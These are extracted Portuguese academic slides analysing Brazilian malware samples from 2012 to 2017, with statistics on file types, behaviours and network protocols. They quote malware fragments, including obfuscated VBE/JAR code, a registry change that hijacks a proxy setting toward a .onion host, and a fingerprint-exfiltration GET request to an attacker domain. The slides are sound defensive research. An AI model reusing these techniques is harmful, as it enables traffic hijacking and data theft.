An´
alise do Malware Ativo na Internet Brasileira:
4 anos depois. O que mudou?
Marcus Botacin
1
1
Universidade Federal do Paran´
a (UFPR)
mfbotacin@inf.ufpr.br
@MarcusBotacin
T´
opicos
1
Introduc
¸˜
ao
O processo de infecc
¸˜
ao
2
An´
alise dos Exemplares Coletados
Formatos de Arquivos
Comportamentos Maliciosos
Tr´
afego de Rede
3
Conclus˜
oes
Era uma vez...
Era uma vez...
Era uma vez...
Era uma vez...
Era uma vez...
T´
opicos
1
Introduc
¸˜
ao
O processo de infecc
¸˜
ao
2
An´
alise dos Exemplares Coletados
Formatos de Arquivos
Comportamentos Maliciosos
Tr´
afego de Rede
3
Conclus˜
oes
Limitac
¸˜
oes
Conclus˜
oes
Diversidade de Formatos.
10%
20%
30%
40%
50%
60%
70%
80%
90%
100%
Samples (%)
Evolution of threat’s filetype
PE
CPL
.NET
DLL
JAR
JS
VBE
Ameac¸as VBE
1
Set N i c s = o b J W M I S e r v i c e . E x E c Q u e r y ( " S E L E C T ␣ * ␣ F R O M ␣
W i n 3 2 _ N e t w o r k A d a p t e r C o n f i g u r a t i o n ␣ W H E R E ␣
I P E n a b l e d ␣ = ␣ T r u e " )
C´
odigo 1:
Exemplar de malware VBE obtendo informac
¸˜
oes de sistema
atrav´
es da consulta SQL as bases de dados.
1
set o b j S h e l l = C r e a t e O b j e c t ( C r y p t X o r ( " c0 +\4 " , " N0X " )
& " . A p p l i c a t i o n " )
C´
odigo 2:
Exemplar de malware VBE instanciando um objeto a partir
de uma string codificada usando operac
¸˜
oes XOR.
Ameac¸as JAVA
1
p u b l i c s t a t i c v o i d m a i n ( S t r i n g a r g s []) {
2
F i l e j s j m j 3 1 9 4 = new F i l e (( new S t r i n g B u i l d e r (
S t r i n g . v a l u e O f ( b c v s n p d b x w 4 0 9 5 ( " T H K H B I ... " ,
a b d w w h f t j b 7 7 4 3 ) ) ) ) . a p p e n d ( " x " ) . t o S t r i n g () ) ;
C´
odigo 3:
Exemplar de malware JAR ofuscado.
1
if ( j s j m j 3 1 9 4 . e x i s t s () )
2
S y s t e m . e x i t (1) ;
C´
odigo 4:
Exemplar de malware JAR confirmando a infecc
¸˜
ao.
Ameac¸as JavaScript
1
. p r o t o c o l === " h t t p s : " ? " h t t p s :// s . " : " h t t p :// e . " )
+ " . s e r v e r . com / q . js "
C´
odigo 6:
Exemplar de malware Javascript construindo uma URL em
tempo de execuc
¸˜
ao.
T´
opicos
1
Introduc
¸˜
ao
O processo de infecc
¸˜
ao
2
An´
alise dos Exemplares Coletados
Formatos de Arquivos
Comportamentos Maliciosos
Tr´
afego de Rede
3
Conclus˜
oes
Como os exemplares s˜
ao detectados?
0%
10%
20%
30%
PSW
Win32
Delf
Luhe
Delfi
Inject2
Comportamentos Observados
Tabela:
Comparac
¸˜
ao dos comportamentos observados no dataset
brasileiro e no trabalho de Bayer et al.
Comportamento
Brasil
Bayer et al. (2009)
Alterac
¸˜
ao de hosts
0.09%
1.97%
Criac
¸˜
ao de arquivos
24.64%
70.78%
Remoc¸˜
ao de arquivos
12.09%
42.57%
Modificac
¸˜
ao de arquivos
16.09%
79.87%
Instalac
¸˜
ao de BHOs
1.03%
1.72%
Tr´
afego de Rede
96.47%
55.18%
Configurac¸˜
ao Autom´
atica de Proxy (PAC).
1m a l w a r e . exe | S e t V a l u e K e y | H K C U \ S o f t w a r e \ M i c r o s o f t \
I n t e r n e t E x p l o r e r \ S e a r c h S c o p e s \{ ID }| O S D F i l e U R L |
f i l e : // / C :/ U s e r s / W i n 7 / A p p D a t a / L o c a l / T N T 2 /
P r o f i l e s / e 0 e 6 3 d c b b 2 9 a 2 1 8 0 f 8 3 0 0 /
o s e 0 e 6 3 d c b b 2 9 a 2 1 8 0 f 8 3 0 0 . xml
C´
odigo 7:
Trecho de um trac
¸o de execuc
¸˜
ao de um exemplar de
malware definindo uma configurac
¸˜
ao de proxy via arquivo PAC.
1
m a l w a r e . exe | S e t V a l u e K e y | H K C U \ S o f t w a r e \ M i c r o s o f t \
W i n d o w s \ C u r r e n t V e r s i o n \ I n t e r n e t S e t t i n g s |
A u t o C o n f i g U R L | h t t p : // p 3 v r a m f c x 4 y b p v n j . o n i o n /
B l 5 C H r Z V . js ? ip = 1 4 3 . 1 0 6 . Y . Z
T´
opicos
1
Introduc
¸˜
ao
O processo de infecc
¸˜
ao
2
An´
alise dos Exemplares Coletados
Formatos de Arquivos
Comportamentos Maliciosos
Tr´
afego de Rede
3
Conclus˜
oes
Uso de Protocolos
Tabela:
Comparac
¸˜
ao do tr´
afego de rede exibido pelos exemplares de
malware brasileiros e os observador por Bayer et al.
Protocolo
2012(T)
2013(T)
2014(T)
2015(T)
2016(T)
2017(T)
Bayer(09)
TCP
40.87%
41.24%
56.19%
64.24%
74.86%
84.85%
45.74%
UDP
52.76%
54.74%
52.00%
59.42%
74.86%
84.85%
27.34%
ICMP
1.28%
1.70%
1.33%
5.63%
0.57%
1.17%
7.58%
DNS
52.69%
54.73%
51.98%
49.04%
47.43%
74.59%
24.53%
HTTP
38.63%
39.69%
52.03%
44.93%
74.86%
84.38%
20.75%
SSL
5.30%
5.62%
4.64%
6.53%
10.29%
26.57%
0.23%
SMTP
0.21%
0.01%
0.06%
0.21%
0.0%
0.0%
N.A.
1Exfiltrac¸˜
ao de Informac¸˜
oes.
1
GET m a i s u m a v e z c o n t a . i n f o / e s c r i t a /? C l i e n t =
Y 2 9 u d G F k b 3 I w M w ==& G e t M a c A d d r e s s =
N T I 6 N T Q 6 M D A 6 Q T A 6 M D Q 6 M T k =&
G e t W i n V e r s i o n A s S t r i n g W i n A r c h = V 2 l u Z G 9 3 c y A 3 I C g 2 N C k
=& V e r s a o M o d u l o = djE =& G e t P C N a m e = V 0 l O N 1 9 W T T E =&
D e t e c t P l u g i n = T u N v & D e t e c t A n t i V i r u s = T 0 Z G
C´
odigo 9:
Trecho de um tr´
afego de rede exemplificando um exemplar
de malware que realiza o fingerprint da m´
aquina infectada.
1